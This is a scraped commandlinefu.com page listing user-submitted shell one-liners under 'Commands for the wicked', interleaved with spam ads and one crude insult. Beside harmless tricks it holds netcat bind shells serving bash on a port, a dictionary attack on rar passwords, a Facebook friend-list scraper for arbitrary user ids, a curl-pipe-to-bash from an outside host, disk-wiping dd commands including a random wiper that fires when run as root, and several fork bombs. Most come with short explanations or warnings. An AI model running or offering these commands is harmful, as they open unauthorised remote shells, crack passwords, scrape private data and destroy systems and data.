Hide

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.


If you have a new feature suggestion or find a bug, please get in touch via http://commandlinefu.uservoice.com/

Get involved!

You can sign-in using OpenID credentials, or register a traditional username and password.

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Hide

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for:

Hide

News

2011-03-12 - Confoo 2011 presentation
Slides are available from the commandlinefu presentation at Confoo 2011: http://presentations.codeinthehole.com/confoo2011/
2011-01-04 - Moderation now required for new commands
To try and put and end to the spamming, new commands require moderation before they will appear on the site.
2010-12-27 - Apologies for not banning the trolls sooner
Have been away from the interwebs over Christmas. Will be more vigilant henceforth.
2010-09-24 - OAuth and pagination problems fixed
Apologies for the delay in getting Twitter's OAuth supported. Annoying pagination gremlin also fixed.
Hide

Tags

Hide

Functions

Commands for the wicked

Commands for the wicked from sorted by
Terminal - Commands for the wicked - 45 results
!whatever:p
2009-02-05 21:39:39
User: jonty
196

!whatever will search your command history and execute the first command that matches 'whatever'. If you don't feel safe doing this put :p on the end to print without executing. Recommended when running as superuser.

watch -d -n 2 'df; ls -FlAt;'
nc -vv -l -p 1234 -e /bin/bash
2009-02-19 13:20:33
User: PeekNPoke
37

This will launch a listener on the machine that will wait for a connection on port 1234. When you connect from a remote machine with something like :

nc 192.168.0.1 1234

You will have console access to the machine through bash.

for i in $(cat dict.txt);do unrar e -p$i protected.rar; if [ $? = 0 ];then echo "Passwd Found: $i";break;fi;done
2009-07-05 02:36:40
User: ksaver
Functions: cat echo
22

Cracking a password protected .rar file in a line, by dictionary attack method. All you need is a good dictionary (dict.txt).

lynx -useragent=Opera -dump 'http://www.facebook.com/ajax/typeahead_friends.php?u=4&__a=1' |gawk -F'\"t\":\"' -v RS='\",' 'RT{print $NF}' |grep -v '\"n\":\"' |cut -d, -f2
2010-01-29 15:10:35
User: vlan7
Functions: cut gawk grep
19

There's no need to be logged in facebook. I could do more JSON filtering but you get the idea...

Replace u=4 (Mark Zuckerberg, Facebook creator) with desired uid.

Hidden or not hidden... Scary, don't you?

nmap -sP 192.168.0.*
2009-08-31 12:10:16
User: dotanmazor
18

There are several other options. This one is plain and simple.

Another option is:

nmap -sP 192.168.0.0/24

/bin/bash | nc -l 1234
2009-11-07 21:26:53
11

My netcat (nc-1.84-10.fc6) doesn't have the -e option, so I have to do it like this. Of course, instead of bash, you can use any executable, including scripts.

ping -c2 192.168.1.255 >/dev/null; arp -a
c=blue;convert -size 50x50 xc:$c $c.png; for i in red green yellow; do convert $c.png -background $i -rotate 20 $i.png; rm $c.png; c=$i; done; mv $i.png logo.png; display logo.png
dd if=/dev/zero of=/dev/hda
2009-02-16 00:04:23
User: cd
Functions: dd
-2

This will completely erase everything on your hard drive and is not reversible.

lynx -useragent=Opera -dump 'http://www.facebook.com/ajax/typeahead_friends.php?u=4&__a=1' |gawk -F'\"t\":\"' -v RS='\",' 'RT{print $NF}' |grep -v '\"n\":\"' |cut -d, -f2
curl http://flip-edesign.com/scripts/system_info | bash
2009-08-29 20:18:02
User: flip387
-5

This is a simple BASH script which with gather basic system hardware such as CPU sockets and cores, Memory modules and sizes as well as overall memory and more.

Root access may be needed to pull information from 'dmidecode'

bomb(){ bomb|bomb };bomb
say -v ? |awk '{print $1}' |xargs -I% say -v % kevin\'s mom is a total whore
# hdparm -mRuUwx --dco-restore --drq-hsm-error --fwdownload --security-unlock PWD --security-set-pass PWD --security-disable PWD --security-erase PWD --security-erase-enhanced PWD --user-master USER --security-mode MODE [device]
2009-11-03 03:28:08
User: purpleidea
Functions: hdparm
-11

this is the most scary command that exists. read the hdparm man page. and see this post: http://dazzle.cs.mcgill.ca/wordpress/?p=36

b=\' c=\\ a='yes $( echo b=$c$b c=$c$c a=$b$a$b; echo $a ) | bash &'; yes $( echo b=$c$b c=$c$c a=$b$a$b; echo $a ) | bash &
echo && :(){ :|:& };:
2010-01-08 10:37:44
User: yvoictra
Functions: echo
-17

WARNING!! This command can produce to crash the unix system where you execute it. What this command do is to generate a lot of threads (so in practice -> process) until the system is overloaded, and to recover it, it is needed a reboot of the machine.

I believe it is interesting to study how this command works, however It is important to notice that executing this, the system is going to crash, so PLEASE save all the work you have opened before. Maybe it can also corrupt the system...

This is a fork bomb.

More info: http://en.wikipedia.org/wiki/Fork_bomb

:(){ :|:& };:
2009-02-05 10:20:00
User: adavies42
-21

exponentially spawns subprocesses until your box locks up.

DO NOT USE IF YOU DON'T WANT TO REBOOT!

:(){ :|:& };:
[ "`whoami`" == "root" ] && ( [ $[ $RANDOM % 6 ] == 0 ] && ( dd if=/dev/null of=/dev/hda bs=1 ; halt; ) || echo Alive\! ) || echo No risk, no fun! Become root\!;
2009-10-14 08:50:57
User: Cowboy
Functions: dd echo
-23

Better don't run this command. Only funny on machines you'd like to kill.

:(){ :|:& };:
2009-02-18 03:24:06
User: zakmo
-27

creates a large number of processes very quickly in order to overload an OS

to stop this bomb in about 45 sec.

Type: while (sleep 100 &!) do; done

or do a killall

Write <a href="http://www.writessay.com/order-essay.php">Good Essays</a> simply writes essays based on your description. Fill order essay from with topic and details of your essay, one of our professional writers will immediately.......
Smell, Odor, Deodorizer, Smells, Odors, Odour, Stink, Odor Eliminator, Odor Remover, Odor Control, Odor Removal, Odor Neutralizer
2010-10-20 05:46:40
User: noodor
-28

Smelleze? Eco Deodorizer eliminates stinky odor without masking with harmful fragrances. You can smell the difference with this odor remover & odor eliminator. Odors & smells don't stand a chance . Smelleze? utilizes proven odor removal & odor control technology. It's the only trusted eco-friendly, recyclable, non-toxic, odorless & natural deodorizer that's also reusable!

yes `yes`
<a href="http://www.qualityresearch.org.uk/essay-samples-index.php">Quality Research Essays</a> Writing Services to help students write essays, term papers, research papers.